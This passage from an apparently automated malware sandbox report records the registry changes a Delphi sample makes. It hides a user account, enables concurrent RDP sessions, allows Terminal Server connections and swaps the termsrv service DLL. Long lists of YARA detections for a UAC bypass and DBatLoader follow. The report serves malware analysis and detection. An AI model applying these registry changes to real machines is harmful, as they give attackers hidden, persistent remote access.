HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\U success or wait 1 7D2253 RegCreateKeyEx

serList A

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core success or wait 1 7D4E12 RegCreateKeyEx

Key Value Created

Key Path Name Type Data Completion Count Source Address Symbol

HKEY_CURRENT_USER\Softwar MaxConnection dword 10 success or wait 1 7D74D8 RegSetValueEx

e\Mic sPer1_0Server A
rosoft\Windows\CurrentVersion\
Internet Settings

HKEY_CURRENT_USER\Softwar MaxConnection dword 10 success or wait 1 7D74ED RegSetValueEx

e\Mic sPerServer A
rosoft\Windows\CurrentVersion\
Internet Settings

HKEY_LOCAL_MACHINE\SOFT rDeC.jI dword 0 success or wait 1 7D2270 RegSetValueEx

WARE\Microsoft\Windows W
NT\CurrentVers
ion\Winlogon\SpecialAccounts\U
serList

HKEY_CURRENT_USER\Softwar rudp unicode rDeC.jI success or wait 1 7D4DC6 RegSetValueEx

e\Mic W
rosoft\Windows\CurrentVersion\
Explorer\HN7J6B4LG6

HKEY_CURRENT_USER\Softwar rpdp unicode .cDDqft success or wait 1 7D4DC6 RegSetValueEx

e\Mic W
rosoft\Windows\CurrentVersion\
Explorer\HN7J6B4LG6

HKEY_LOCAL_MACHINE\SYSTE EnableConcurre dword 1 success or wait 1 7D10C6 RegSetValueEx

M\ControlSet001\Control\Terminal ntSessions W
Server\Licensing Core

HKEY_LOCAL_MACHINE\SOFT AllowMultipleTS dword 1 success or wait 1 7D1138 RegSetValueEx

WARE\Microsoft\Windows Sessions W
NT\CurrentVersion\Winlogon

Key Value Modiﬁed

Source
Key Path Name Type Old Data New Data Completion Count Symbol
Address

HKEY_LOCAL_MACH ServiceDll expand unicode %SystemRoot%\System3 %ProgramFiles%\Micr success or wait 1 7D1447 RegSetValueEx
INE\SYSTEM\Cont 2\termsrv.dll osoft DN1\sqlmap.dll W
rolSet001\Services\Ter
mService\Parameters

HKEY_LOCAL_MACH fDenyTSConnect dword 1 0 success or wait 1 7D101E RegSetValueEx

INE\SYSTEM\Cont ions W
rolSet001\Control\Ter
minal Server

Analysis Process: Scxozm.exe PID: 5768, Parent PID: 3616

General
Target ID: 18

Start time: 15:51:26

Start date: 25/07/2022

Path: C:\Users\Public\Libraries\Scxozm.exe

Wow64 process (32bit): true

Commandline: "C:\Users\Public\Libraries\Scxozm.exe"

Imagebase: 0x400000

File size: 818176 bytes

MD5 hash: C9EE1D6A90BE7524B01814F48B39B232

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: Borland Delphi

Yara matches: Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.354789031.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Copyright Joe Security LLC 2022 Page 59 of 74
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.384759325.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.355139169.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345280997.0000000002A78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.377597243.0000000004EBC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.369788133.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.380907384.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.358484770.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.360661759.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.360999654.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.348500481.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.382569178.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.365040453.0000000004D54000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.361850386.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.375438559.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.379204485.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.352117778.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.380485571.0000000004E84000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.372039435.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.349780560.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.363162364.0000000004D54000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.378461807.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.351118201.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.371282125.0000000004E7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345725899.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.365734311.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.355626617.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.356609035.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.372284500.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346314388.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.347214520.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.356759787.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.371440730.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.348883188.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.380206131.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.347105324.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.348304487.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.378931445.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.376535794.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.378846008.0000000004EB8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346948621.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.355869791.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.385310318.0000000004E84000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000012.00000002.394885149.00000000029A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.378071413.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.369348794.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.377768609.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.362673762.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.358393109.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346228164.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.370439196.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.381501577.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.374885017.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.370818518.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.373654360.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.383521159.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000012.00000002.391739485.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.354413614.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345338340.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000012.00000002.400680310.000000007FDE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.359191249.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.363388596.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.353461083.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.354128862.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.362073614.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345497877.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.351437130.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.358099096.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.382300306.0000000004E84000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.376828049.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346590437.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.359686961.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.350810530.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.377043561.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346494860.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.362448178.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345592949.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.384132901.0000000004E84000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.358896436.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.357866728.0000000004D54000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346803168.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.377271685.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.379494555.0000000004E88000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.373789263.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.369938688.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.358617253.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000002.397232737.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.381317448.0000000004E84000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.376662291.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.370942685.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.355301557.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000012.00000002.400224117.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.360326946.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.385014436.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.375149222.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.376403623.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.359026942.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.375826080.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.383081105.0000000004E4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.347026123.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.374450939.0000000004E7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345423600.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346652042.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345643464.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.347666536.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.384615836.0000000004E84000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.348032680.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.379796640.0000000004EBC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.352767026.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000002.397860139.0000000004F47000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.360221676.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.369868577.0000000004E4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.358237163.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.359311680.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.352947344.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000012.00000002.396023571.00000000047F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.375705426.0000000004E7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.373237601.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346761220.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.372776782.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.383452260.0000000004E84000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.363728623.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.374177768.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.366707380.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.360806709.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346399446.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.369480200.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.371794841.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.374631379.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
